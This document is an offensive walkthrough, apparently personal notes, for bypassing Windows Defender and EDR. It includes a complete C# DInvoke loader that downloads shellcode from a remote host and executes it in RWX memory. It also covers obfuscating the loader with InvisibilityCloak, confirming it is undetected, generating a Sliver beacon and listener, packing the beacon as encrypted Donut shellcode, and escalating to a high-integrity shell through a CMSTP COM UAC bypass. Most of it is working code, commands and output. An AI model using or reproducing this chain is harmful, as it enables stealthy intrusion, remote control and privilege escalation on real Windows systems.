Bypass AV/EDR via DInvoke + Sliver

Windows Defender 2025

Creating Loader

Repository: https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Net;

namespace DInvoke_Code
{
    class Program
    {
        static void Main(string[] args)
        {

            //Dinvoke test
            byte[] codepent = new WebClient().DownloadData("http://192.168.1.109:8080/rev.bin");

            // Console.WriteLine((uint)codepent.Length);
            // System.Threading.Thread.Sleep(10000);
            IntPtr func_ptr = IntPtr.Zero;
            // IntPtr pHandle = Process.GetCurrentProcess().Handle;
            
            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "VirtualAlloc");
            DELEGATES.VirtualAllocRx VirtualAllocRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.VirtualAllocRx)) as DELEGATES.VirtualAllocRx;
            IntPtr rMemAddress = VirtualAllocRx(0, (uint)codepent.Length, 0x1000 | 0x2000, 0x40);

            Marshal.Copy(codepent, 0, (IntPtr)(rMemAddress), codepent.Length);
            IntPtr hThread = IntPtr.Zero;
            IntPtr pinfo = IntPtr.Zero;
            UInt32 threadId = 0;

            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "CreateThread");
            DELEGATES.CreateThreadRx CreateThreadRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.CreateThreadRx)) as DELEGATES.CreateThreadRx;
            hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId);

            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "WaitForSingleObject");
            DELEGATES.WaitForSingleObjectRx WaitForSingleObjectRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.WaitForSingleObjectRx)) as DELEGATES.WaitForSingleObjectRx;
            WaitForSingleObjectRx(hThread, 0xFFFFFFFF);
        }
    }
}

Obfuscation the project

Obfuscation project:

GitHub - h4wkst3r/InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation toolsGitHub

Modify the lines 147,148 as follows:

openAssemblyInfoFile = open(assemblyInfoFile, 'r',encoding='utf-8')
openCopyAssemblyInfoFile = open(f"{assemblyInfoFile}_copy", "w",encoding='utf-8')

PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak > python.exe .\InvisibilityCloak.py -d ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload -n "Zero" -m reverse

        ,                 .     .   .        ,-. .         ,
        |         o     o |   o | o |       /    |         |
        | ;-. . , . ,-. . |-. . | . |-  . . |    | ,-. ,-: | ,
        | | | |/  | `-. | | | | | | |   | | \    | | | | | |<
        ' ' ' '   ' `-' ' `-' ' ' ' `-' `-|  `-' ' `-' `-` ' `
                                        `-'

====================================================
[*] INFO: String obfuscation method: reverse
[*] INFO: Directory of C# project: ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload
[*] INFO: New tool name: Zero
====================================================

[*] INFO: Generating new GUID for C# project
[*] INFO: New project GUID is f9d3c7e4-82de-4a66-9eba-8b0b3c149768
[*] INFO: Changing C# project GUID in below files:
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_shellcodeload.sln
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvoke_shellcodeload.csproj
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Properties\AssemblyInfo.cs


[*] INFO: Removing PDB string in C# project file

[*] INFO: Renaming DInvoke_shellcodeload.sln to Zero.sln
[*] INFO: Renaming DInvoke_shellcodeload.csproj to Zero.csproj
[*] INFO: Renaming directory DInvoke_shellcodeload to Zero

[+] SUCCESS: New GUID of f9d3c7e4-82de-4a66-9eba-8b0b3c149768 was generated and replaced in your project
[+] SUCCESS: New tool name of Zero was replaced in project

[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DELEGATES.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Program.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x64\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs

[+] SUCCESS: Your new tool Zero now has the invisibility cloak applied.

FLARE-VM 04/30/2025 16:31:00
PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak >

Ofuscated Code with Reverse Mode

In visual studio change the properties of Output Type to Windows Application

Finally, Replace every instance of DInvoke into the project and compile it as Realese with x64 architecture.

PS C:\Users\maldev\Desktop\CompiledTools\DefenderCheck\DefenderCheck\DefenderCheck\bin\Release > .\DefenderCheck.exe C:\Users\maldev\Desktop\CompiledTools\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\bin\x64\Release\DInvoke_test.exe
[+] No threat found in submitted file!

Create beacon with sliver

sliver > generate beacon --http 192.168.1.109:1234 --os windows

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 43s
[*] Implant saved to /home/Intrusionz3r0/Documents/Sliver/KOREAN_JUNKER.exe

sliver > http --lhost 192.168.1.109 --lport 1234 

[*] Starting HTTP :1234 listener ...
[*] Successfully started job #2

sliver >  

Install Donut

#Download and compile donut
Intrusionz3r0@htb[/htb]$ git clone https://github.com/TheWover/donut
Intrusionz3r0@htb[/htb]$ cd donut/
Intrusionz3r0@htb[/htb]$ make -f Makefile
Intrusionz3r0@htb[/htb]$ ./donut ./

Using donut specify -e 3 for encryption and -b 1 to not add Amsi bypass because the used Amsi bypass gets detected.

❯ ./donut -i KOREAN_JUNKER.exe -b 1 -e 3 -o rev.bin

  [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "KOREAN_JUNKER.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : none
  [ PE Headers    : overwrite
  [ Shellcode     : "rev.bin"
  [ Exit          : Thread

Payload Downloaded and executed successfully

Install UAC-BOF-Bonanza toolkit into Sliver

❯ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
❯ cd UAC-BOF-Bonanza
❯ cp -rp ~/Documents/Tools/UAC-BOF-Bonanza/CmstpElevatedCOM/ ~/.sliver-client/extensions
❯ cd ~/.sliver-client/extensions/CmstpElevatedCOM
❯ make
sliver (KOREAN_JUNKER) > extensions load /home/Intrusionz3r0/.sliver-client/extensions/CmstpElevatedCOM
sliver (KOREAN_JUNKER) > armory install coff-loader

Elevate token as high integrity Shell

sliver (KOREAN_JUNKER) > CmstpElevatedCOM "C:\Users\maldev\Downloads\http-local-1234.exe"
[*] Successfully executed CmstpElevatedCOM (coff-loader)
[*] Got output:
Successfully spoofed PEB for explorer.exe
Successfully created elevated CMLuaUtil COM object
Calling ShellExec method from the elevated CMLuaUtil COM object...
ShellExec executed successfully!

High Integrity Shell

ddd